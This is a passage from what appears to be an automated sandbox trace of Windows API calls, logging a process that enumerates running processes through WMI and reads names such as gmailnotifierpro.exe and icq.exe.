puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.194] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.194] IWbemClassObject:Get (in: This=0x5ebb9f8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f1810*=0, plFlavor=0x26f1814*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="gmailnotifierpro.exe", varVal2=0x0), pType=0x26f1810*=8, plFlavor=0x26f1814*=0) returned 0x0 [0225.194] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0225.194] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0225.194] IWbemClassObject:Get (in: This=0x5ebb9f8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f1810*=8, plFlavor=0x26f1814*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="gmailnotifierpro.exe", varVal2=0x0), pType=0x26f1810*=8, plFlavor=0x26f1814*=0) returned 0x0 [0225.194] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0225.194] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0225.195] CoTaskMemAlloc (cb=0x4) returned 0x5ebaf70 [0225.195] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebaf70, puReturned=0x26dde18 | out: apObjects=0x5ebaf70*=0x5ebbb90, puReturned=0x26dde18*=0x1) returned 0x0 [0225.195] IUnknown:QueryInterface (in: This=0x5ebbb90, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebbb90) returned 0x0 [0225.196] IUnknown:QueryInterface (in: This=0x5ebbb90, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.196] IUnknown:QueryInterface (in: This=0x5ebbb90, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.196] IUnknown:AddRef (This=0x5ebbb90) returned 0x3 [0225.196] IUnknown:QueryInterface (in: This=0x5ebbb90, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.196] IUnknown:QueryInterface (in: This=0x5ebbb90, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.196] IUnknown:QueryInterface (in: This=0x5ebbb90, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebbb94) returned 0x0 [0225.196] IMarshal:GetUnmarshalClass (in: This=0x5ebbb94, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.196] IUnknown:Release (This=0x5ebbb94) returned 0x3 [0225.196] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.196] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.196] IUnknown:QueryInterface (in: This=0x5ebbb90, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.196] IUnknown:Release (This=0x5ebbb90) returned 0x2 [0225.196] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.196] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.196] IUnknown:QueryInterface (in: This=0x5ebbb90, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebbb90) returned 0x0 [0225.196] IUnknown:AddRef (This=0x5ebbb90) returned 0x4 [0225.196] IUnknown:Release (This=0x5ebbb90) returned 0x3 [0225.196] IUnknown:Release (This=0x5ebbb90) returned 0x2 [0225.196] CoTaskMemFree (pv=0x5ebaf70) [0225.197] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.197] IUnknown:AddRef (This=0x5ebbb90) returned 0x3 [0225.197] IWbemClassObject:Get (in: This=0x5ebbb90, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.197] IWbemClassObject:Get (in: This=0x5ebbb90, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.197] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"") returned 0x66 [0225.197] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"") returned 0x66 [0225.197] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.197] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.197] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.197] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.198] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebaf70) returned 0x0 [0225.198] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebaf70, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.198] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebaf70, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8b98) returned 0x0 [0225.198] WbemDefPath:IUnknown:Release (This=0x5ebaf70) returned 0x0 [0225.198] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8b98, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8b98) returned 0x0 [0225.198] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8b98, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.199] WbemDefPath:IUnknown:AddRef (This=0x5eb8b98) returned 0x3 [0225.199] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8b98, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.199] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8b98, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.199] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8b98, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebaf80) returned 0x0 [0225.199] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebaf80, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.199] WbemDefPath:IUnknown:Release (This=0x5ebaf80) returned 0x3 [0225.199] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.199] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.199] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8b98, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.199] WbemDefPath:IUnknown:Release (This=0x5eb8b98) returned 0x2 [0225.199] WbemDefPath:IUnknown:Release (This=0x5eb8b98) returned 0x1 [0225.199] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.199] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.199] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8b98, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8b98) returned 0x0 [0225.199] WbemDefPath:IUnknown:AddRef (This=0x5eb8b98) returned 0x3 [0225.199] WbemDefPath:IUnknown:Release (This=0x5eb8b98) returned 0x2 [0225.199] WbemDefPath:IWbemPath:SetText (This=0x5eb8b98, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"") returned 0x0 [0225.199] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.199] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.199] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.199] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.199] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.200] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.200] IWbemClassObject:Get (in: This=0x5ebbb90, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f20a4*=0, plFlavor=0x26f20a8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="icq.exe", varVal2=0x0), pType=0x26f20a4*=8, plFlavor=0x26f20a8*=0) returned 0x0 [0225.200] SysStringByteLen (bstr="icq.exe") returned 0xe [0225.200] SysStringByteLen (bstr="icq.exe") returned 0xe [0225.200] IWbemClassObject:Get (in: This=0x5ebbb90, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f20a4*=8, plFlavor=0x26f20a8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="icq.exe", varVal2=0x0), pType=0x26f20a4*=8, plFlavor=0x26f20a8*=0) returned 0x0 [0225.200] SysStringByteLen (bstr="icq.exe") returned 0xe [0225.200] SysStringByteLen (bstr="icq.exe") returned 0xe [0225.200] CoTaskMemAlloc (cb=0x4) returned 0x5ebafb0 [0225.200] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebafb0, puReturned=0x26dde18 | out: apObjects=0x5ebafb0*=0x5ebbd28, puReturned=0x26dde18*=0x1) returned 0x0 [0225.306] IUnknown:QueryInterface (in: This=0x5ebbd28, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebbd28) returned 0x0 [0225.306] IUnknown:QueryInterface (in: This=0x5ebbd28, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.306] IUnknown:QueryInterface (in: This=0x5ebbd28, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.306] IUnknown:AddRef (This=0x5ebbd28) returned 0x3 [0225.306] IUnknown:QueryInterface (in: This=0x5ebbd28, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.306] IUnknown:QueryInterface (in: This=0x5ebbd28, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.307] IUnknown:QueryInterface (in: This=0x5ebbd28, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebbd2c) returned 0x0 [0225.307] IMarshal:GetUnmarshalClass (in: This=0x5ebbd2c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.307] IUnknown:Release (This=0x5ebbd2c) returned 0x3 [0225.307] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.307] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.307] IUnknown:QueryInterface (in: This=0x5ebbd28, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.307] IUnknown:Release (This=0x5ebbd28) returned 0x2 [0225.307] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.307] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.307] IUnknown:QueryInterface (in: This=0x5ebbd28, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebbd28) returned 0x0 [0225.307] IUnknown:AddRef (This=0x5ebbd28) returned 0x4 [0225.307] IUnknown:Release (This=0x5ebbd28) returned 0x3 [0225.307] IUnknown:Release (This=0x5ebbd28) returned 0x2 [0225.307] CoTaskMemFree (pv=0x5ebafb0) [0225.308] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.308] IUnknown:AddRef (This=0x5ebbd28) returned 0x3 [0225.308] IWbemClassObject:Get (in: This=0x5ebbd28, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.309] IWbemClassObject:Get (in: This=0x5ebbd28, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1588\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.309] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1588\"") returned 0x66 [0225.309] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1588\"") returned 0x66 [0225.309] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.309] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.309] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.309] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.310] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebafb0) returned 0x0 [0225.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebafb0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.311] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebafb0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8c78) returned 0x0 [0225.311] WbemDefPath:IUnknown:Release (This=0x5ebafb0) returned 0x0 [0225.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8c78, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8c78) returned 0x0 [0225.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8c78, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.311] WbemDefPath:IUnknown:AddRef (This=0x5eb8c78) returned 0x3 [0225.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8c78, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8c78, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8c78, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebafc0) returned 0x0 [0225.312] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebafc0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.312] WbemDefPath:IUnknown:Release (This=0x5ebafc0) returned 0x3 [0225.312] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.312] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8c78, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.312] WbemDefPath:IUnknown:Release (This=0x5eb8c78) returned 0x2 [0225.312] WbemDefPath:IUnknown:Release (This=0x5eb8c78) returned 0x1 [0225.312] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.312] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.312] 